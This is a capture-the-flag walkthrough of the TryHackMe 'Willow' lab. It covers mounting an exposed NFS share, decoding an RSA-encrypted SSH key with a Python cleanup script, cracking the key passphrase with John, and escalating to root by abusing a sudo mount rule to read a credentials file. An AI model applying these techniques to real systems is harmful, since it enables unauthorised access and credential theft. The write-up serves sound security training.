THM - Willow | An ordinary day

Introduction

What lies under the Willow Tree?

This one is Medium rated with no hints. Let’s begin.

Ports

nmap says we’ve got four ports: 22 (SSH), 80 (HTTP), 111 (RPCBind) and 2049 (NFS). So that’s interesting.

NFS

Let’s go check out the NFS share.

mkdir mountpoint mount -t nfs 10.10.226.215:/ ./mountpoint/

In the mount we have a file; rsa_keys. In that, we get this:

Public Key Pair: (23, 37627)
Private Key Pair: (61527, 37627)

And that’s all we’ve got to go on. But, it’s a start.

Webserver

On the website, all we get is a big old bunch of numbers, i.e:

4865792057696c6c6f772c2068657265277320796f75722053534820507 snip

Actually if we look closely, the first bit is different - it’s hexadecimal. That decodes to:

Hey Willow, here’s your SSH Private key – you know where the decryption key is!.

So presumably the rest of it (and there is a lot) is the SSH key, encoded with RSA….

RSA

Edit: after I was done with this, I went and checked some other writeups. Turns out the whole thing was hex and I could’ve saved myself some messing about by just hex decoding the whole lot right away. But, I didn’t realise that at the time and ended up working a bit harder and dumber. Lol. Here’s what I did:

So we’ve got e, d and n for our RSA decryption, but the cipher won’t decode nicely just the way it is. There may be some simple way around this, but for me it was just looking at the data and trying to figure out what was going on. It helps knowing that an RSA private key begins with

—–BEGIN RSA PRIVATE KEY—–

and ends with

—–END RSA PRIVATE KEY—–

I tried encoding a few of these characters to find out what they were supposed to encode to, and that helped.

Eventually I figured out that we had a bunch of extra 3’s in there. In fact, just about every second character was a superfluous ‘3’. Stripping those out got us close, but not all the way there. We also had a bunch of extra zeros; usually every fifth character but not always. Sort of like a reversed evil FizzBuzz. In the end I wrote some python code to clean up the cipher:

stripped = ''
timesincelast = 0

with open('ciper.txt', 'r') as f:
    data = f.read()
    data_as_str = str(data)
       
    
for index,char in enumerate(data_as_str):
    if index % 2 != 0:
        stripped += char
            
for index, char in enumerate(stripped):
        if index - 1 < len(stripped):
            next = stripped[(index + 1)]
            if char == '0' and next != '0' and timesincelast > 3:
                print (' ', end='')
                timesincelast = 0
            else:
                print(char, end='')
                timesincelast += 1

Decode

Once I had the cleaned up ciper I dropped it into this website and got out an encoded SSH key. John can deal with that:

root@kali:/opt/tryhackme/willow# python /usr/share/john/ssh2john.py id_rsa_enc > id_rsa_john  
root@kali:/opt/tryhackme/willow# john id_rsa_john -w=/usr/share/wordlists/rockyou.txt  
Warning: UTF-8 seen reading id_rsa_john  
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])  
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes  
Cost 2 (iteration count) is 1 for all loaded hashes  
Will run 4 OpenMP threads  
Note: This format may emit false positives, so it will keep trying even after  
finding a possible candidate.  
Press 'q' or Ctrl-C to abort, almost any other key for status  
REDACTED       (id_rsa_enc)

Willow

With this information and the chmodded key we can log in as Willow. The user flag is in a jpg, so we can’t easily view it through SSH. Hmmmm.

Fortunately, we can grab it with scp:

root@kali:/opt/tryhackme/willow# scp -i id_rsa_enc willow@10.10.21.220:/home/willow/user.jpg user.jpg

And then we can view the file and get the flag. Next, let’s see what Willow can do back on the box:

willow@willow-tree:~$ sudo -l  
Matching Defaults entries for willow on willow-tree:  
    env_reset, mail_badpass,   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin  

User willow may run the following commands on willow-tree:  
    (ALL : ALL) NOPASSWD: /bin/mount /dev/*

Privesc

Checking in /dev/, we can find an interesting directory. Let’s check it out:

willow@willow-tree:/dev/shm$ mkdir /tmp/mnt  
willow@willow-tree:/dev/shm$ sudo mount /dev/hidden_backup /tmp/mnt  
willow@willow-tree:/dev/shm$ cd /tmp/mnt/  
willow@willow-tree:/tmp/mnt$ ls -lash  
total 6.0K  
1.0K drwxr-xr-x  2 root root 1.0K Jan 30  2020 .  
4.0K drwxrwxrwt 11 root root 4.0K Aug  8 13:36 ..  
1.0K -rw-r--r--  1 root root   42 Jan 30  2020 creds.txt  
willow@willow-tree:/tmp/mnt$ cat creds.txt  
root:REDACTED
willow:REDACTED

Cool, let’s do su root and grab the flag!

root@willow-tree:~# cat root.txt
This would be too easy, dont you think? I actually gave you the root flag some time ago.
Youve got my password now -- go find your flag!

Wait, what? Haha…what could that mean?

root@kali:/opt/tryhackme/willow# steghide extract -sf user.jpg 
Enter passphrase: 
wrote extracted data to "root.txt".

And that’s where the flag was!

What a cracking box, I enjoyed this one. Thanks MuirlandOracle.